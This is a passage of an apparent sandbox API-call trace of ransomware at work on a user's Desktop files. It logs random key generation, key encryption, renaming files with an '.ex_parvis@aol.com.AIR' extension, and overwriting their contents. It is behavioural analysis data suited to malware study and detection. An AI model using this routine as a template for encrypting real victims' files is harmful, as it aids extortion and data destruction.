	[0099.711] SetFilePointer (in: hFile=0x384, lDistanceToMove=-87998, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.711] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x157be, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x157be, lpOverlapped=0x0) returned 1
	[0099.712] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.712] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0099.712] CloseHandle (hObject=0x384) returned 1
	[0099.713] GetProcessHeap () returned 0x540000
	[0099.713] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.713] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.713] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.713] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588f80 | out: hHeap=0x540000) returned 1
	[0099.713] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589008 | out: hHeap=0x540000) returned 1
	[0099.713] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5febd0
	[0099.713] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.713] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.713] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.713] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.713] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a", dwFileAttributes=0x80) returned 1
	[0099.713] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a") returned 52
	[0099.713] GetProcessHeap () returned 0x540000
	[0099.713] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0099.713] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a"
	[0099.713] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.713] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nmu57lth1.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nmu57lth1.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.715] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nmU57lth1.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nmu57lth1.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.716] GetProcessHeap () returned 0x540000
	[0099.716] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0099.716] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=35642) returned 1
	[0099.716] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8b3a
	[0099.716] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.716] GetProcessHeap () returned 0x540000
	[0099.716] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.716] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.716] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.717] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.717] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.717] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8b3a) returned 0x5ffbb8
	[0099.717] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8b3a) returned 0x608700
	[0099.717] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.717] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x8b3a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x8b3a, lpOverlapped=0x0) returned 1
	[0099.717] SetFilePointer (in: hFile=0x384, lDistanceToMove=-35642, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.717] WriteFile (in: hFile=0x384, lpBuffer=0x608700*, nNumberOfBytesToWrite=0x8b3a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x608700*, lpNumberOfBytesWritten=0x3a1f778*=0x8b3a, lpOverlapped=0x0) returned 1
	[0099.717] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.719] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x608700 | out: hHeap=0x540000) returned 1
	[0099.720] CloseHandle (hObject=0x384) returned 1
	[0099.721] GetProcessHeap () returned 0x540000
	[0099.721] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.721] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.721] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.721] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febd0 | out: hHeap=0x540000) returned 1
	[0099.721] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579dc8 | out: hHeap=0x540000) returned 1
	[0099.721] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0099.721] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.721] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.721] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.721] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.721] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots", dwFileAttributes=0x80) returned 1
	[0099.721] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots") returned 63
	[0099.721] GetProcessHeap () returned 0x540000
	[0099.721] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x56b448
	[0099.721] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots"
	[0099.721] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.721] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mepevir2k0dkad f4icg.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mepevir2k0dkad f4icg.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.724] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MepeviR2K0DKAD f4icg.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mepevir2k0dkad f4icg.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.724] GetProcessHeap () returned 0x540000
	[0099.724] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.724] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=86484) returned 1
	[0099.724] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x151d4
	[0099.724] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.724] GetProcessHeap () returned 0x540000
	[0099.724] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.724] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.724] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.726] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.727] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.727] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x151d4) returned 0x5ffbb8
	[0099.727] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x151d4) returned 0x3790048
	[0099.728] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.728] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x151d4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x151d4, lpOverlapped=0x0) returned 1
	[0099.729] SetFilePointer (in: hFile=0x384, lDistanceToMove=-86484, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.729] WriteFile (in: hFile=0x384, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x151d4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x151d4, lpOverlapped=0x0) returned 1
	[0099.730] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.730] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0099.730] CloseHandle (hObject=0x384) returned 1
	[0099.731] GetProcessHeap () returned 0x540000
	[0099.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589008 | out: hHeap=0x540000) returned 1
	[0099.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589118 | out: hHeap=0x540000) returned 1
	[0099.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x5febd0
	[0099.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.731] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.731] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.731] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp", dwFileAttributes=0x80) returned 1
	[0099.731] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp") returned 54
	[0099.731] GetProcessHeap () returned 0x540000
	[0099.731] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd2) returned 0x56b448
	[0099.731] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp"
	[0099.731] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.732] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lizlrts pd6.odp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lizlrts pd6.odp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.733] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lIZLRTs Pd6.odp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lizlrts pd6.odp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.734] GetProcessHeap () returned 0x540000
	[0099.734] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.734] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=11012) returned 1
	[0099.734] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2b04
	[0099.734] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.734] GetProcessHeap () returned 0x540000
	[0099.734] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.734] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.734] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.735] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.735] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.735] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2b04) returned 0x5ffbb8
	[0099.735] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2b04) returned 0x6026c8
	[0099.735] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.735] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x2b04, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x2b04, lpOverlapped=0x0) returned 1
	[0099.735] SetFilePointer (in: hFile=0x384, lDistanceToMove=-11012, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.735] WriteFile (in: hFile=0x384, lpBuffer=0x6026c8*, nNumberOfBytesToWrite=0x2b04, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6026c8*, lpNumberOfBytesWritten=0x3a1f778*=0x2b04, lpOverlapped=0x0) returned 1
	[0099.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.735] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x6026c8 | out: hHeap=0x540000) returned 1
	[0099.735] CloseHandle (hObject=0x384) returned 1
	[0099.736] GetProcessHeap () returned 0x540000
	[0099.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febd0 | out: hHeap=0x540000) returned 1
	[0099.736] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579d50 | out: hHeap=0x540000) returned 1
	[0099.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589118
	[0099.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.736] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.736] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.736] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav", dwFileAttributes=0x80) returned 1
	[0099.736] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav") returned 56
	[0099.736] GetProcessHeap () returned 0x540000
	[0099.736] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x579d50
	[0099.736] lstrcpyW (in: lpString1=0x579d50, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav"
	[0099.737] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.737] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lchbfndkd8wqz.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lchbfndkd8wqz.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.739] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LCHbfNdkD8Wqz.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lchbfndkd8wqz.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.739] GetProcessHeap () returned 0x540000
	[0099.739] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579d50 | out: hHeap=0x540000) returned 1
	[0099.739] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=57292) returned 1
	[0099.739] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xdfcc
	[0099.739] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.740] GetProcessHeap () returned 0x540000
	[0099.740] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.740] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.740] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.741] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.741] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.741] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdfcc) returned 0x5ffbb8
	[0099.741] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdfcc) returned 0x60db90
	[0099.741] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
